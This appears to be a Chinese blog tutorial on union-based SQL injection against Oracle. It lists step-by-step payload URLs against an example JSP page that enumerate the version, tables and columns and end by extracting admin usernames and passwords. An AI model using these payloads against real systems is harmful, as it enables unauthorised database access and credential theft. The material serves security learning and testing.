zoukankan      html  css  js  c++  java
  • Oracle联合注入总结

    Oracle常规联合注入


    Oracle Database,又名Oracle RDBMS,或简称Oracle。是甲骨文公司的一款关系数据库管理系统。

    Oracle对于MYSQL、MSSQL来说意味着更大的数据量,更大的权限。

    oracle注入中需要注意的一些小点:

    1. Oracle 在使用union 查询的跟Mysql不一样Mysql里面我用1,2,3,4就能占位,而在Oracle里面有比较严格的类型要求。也就是说你union select的要和前面的字段类型一样,我们可以用null来代替站位。
    2. Oracle和mysql不一样,分页中没有limit,而是使用三层查询嵌套的方式实现分页(查询第一条数据“>=0<=1”) 例如:

    SELECT * FROM ( SELECT A.*, ROWNUM RN FROM (select * from session_roles) A WHERE ROWNUM <= 1 ) WHERE RN >= 0

         3. Oracle的单行注释符号是--,多行注释符号/**/。 

    
    

    依旧提交order by 去猜测显示当前页面所用的SQL查询了多少个字段,也就是确认查询字段数。

    http://www.jsporcle.com/a.jsp?username=SMITH%27%20order%20by%208%20--

    http://www.jsporcle.com/a.jsp?username=SMITH%27%20union%20select%20null,null,null,null,null,null,null,null%20from%20dual%20--

    爆数据库版本

    http://www.jsporcle.com/a.jsp?username=SMITH' union select null,null,(select banner from sys.v_$version where rownum=1),null,null,null,null,null from dual  --

    其他查询信息语句:

    1 当前用户权限 (select * from session_roles)
    2 当前数据库版本 ( select banner from sys.v_$version where rownum=13 服务器出口IP (用utl_http.request 可以实现)
    4 服务器监听IP (select utl_inaddr.get_host_address from dual)
    5 服务器操作系统 (select member from v$logfile where rownum=16 服务器sid (select instance_name from v$instance)
    7 当前连接用户 (select SYS_CONTEXT ('USERENV', 'CURRENT_USER') from dual)
    8 当前用户 (SELECT user FROM dual)

    爆库名:

    http://www.jsporcle.com/a.jsp?username=SMITH' union select null,null,(select owner from all_tables where rownum=1),null,null,null,null,null from dual  --
    http://www.jsporcle.com/a.jsp?username=SMITH' union select null,null,(select owner from all_tables where rownum=1 and owner <>'SYS' ),null,null,null,null,null from dual --

    爆表:
    表 一定要是大写的
    查询第一个表

    http://www.jsporcle.com/a.jsp?username=SMITH' union select null,null,(select table_name from user_tables where rownum=1),null,null,null,null,null from dual --

    爆列

    查询 表 ADMIN第一个列

    http://www.jsporcle.com/a.jsp?username=SMITH' union select null,(select column_name from user_tab_columns where table_name='ADMIN' and rownum=1),null,null,null,null,null,null from dual --

    第二个列

    http://www.jsporcle.com/a.jsp?username=SMITH' union select null,(select column_name from user_tab_columns where table_name='ADMIN' and column_name<>'ID' and rownum=1),null,null,null,null,null,null from dual --

    查询表ADMIN 第三个列

    http://www.jsporcle.com/a.jsp?username=SMITH' union select null,(select column_name from user_tab_columns where table_name='ADMIN' and column_name<>'ID' and column_name<>'USERNAME' and rownum=1),null,null,null,null,null,null from dual --

    查询出来列有ID USERNAME PASSWORD

    爆数据

    http://www.jsporcle.com/a.jsp?username=SMITH' union select null,(SELECT CONCAT(USERNAME,PASSWORD) FROM ADMIN),null,null,null,null,null,null from dual --
    http://www.jsporcle.com/a.jsp?username=SMITH' union select null,(SELECT USERNAME FROM ADMIN),(SELECT PASSWORD FROM ADMIN),null,null,null,null,null from dual --

    一些常用的查询语句:

    当前用户:
    SELECT user FROM dual;
    列出所有用户:
    SELECT username FROM all_users ORDER BY username;
    列出数据库
    SELECT DISTINCT owner FROM all_tables;
    列出表名:
    SELECT table_name FROM all_tables;
    SELECT owner, table_name FROM all_tables;
    查询表所有列
    SELECT column_name FROM all_tab_columns WHERE TABLE_NAME='ADMIN';
    定位文件
    SELECT name FROM V$DATAFILE;
  • 相关阅读:
    is quoted with ["] which must be escaped when used within the value
    QueryDSL与SpringDataJPA复杂查询
    遍历list,同时remove不符合条件的元素
    解决AnnotationTransactionAttributeSource is only available on Java 1.5 and highe
    Windows系统安装MySQL
    sqlyog导sql文件
    myeclipse导入maven项目
    Invalid 'log4jConfigLocation' parameter: class path resource [log4j.xml] cannot be resolved to URL because it does not exist
    Nginx SSL+tomcat集群,取不到https正确协议
    微信开发之通过代理调试本地项目
  • 原文地址:https://www.cnblogs.com/-qing-/p/10948662.html
Copyright © 2011-2022 走看看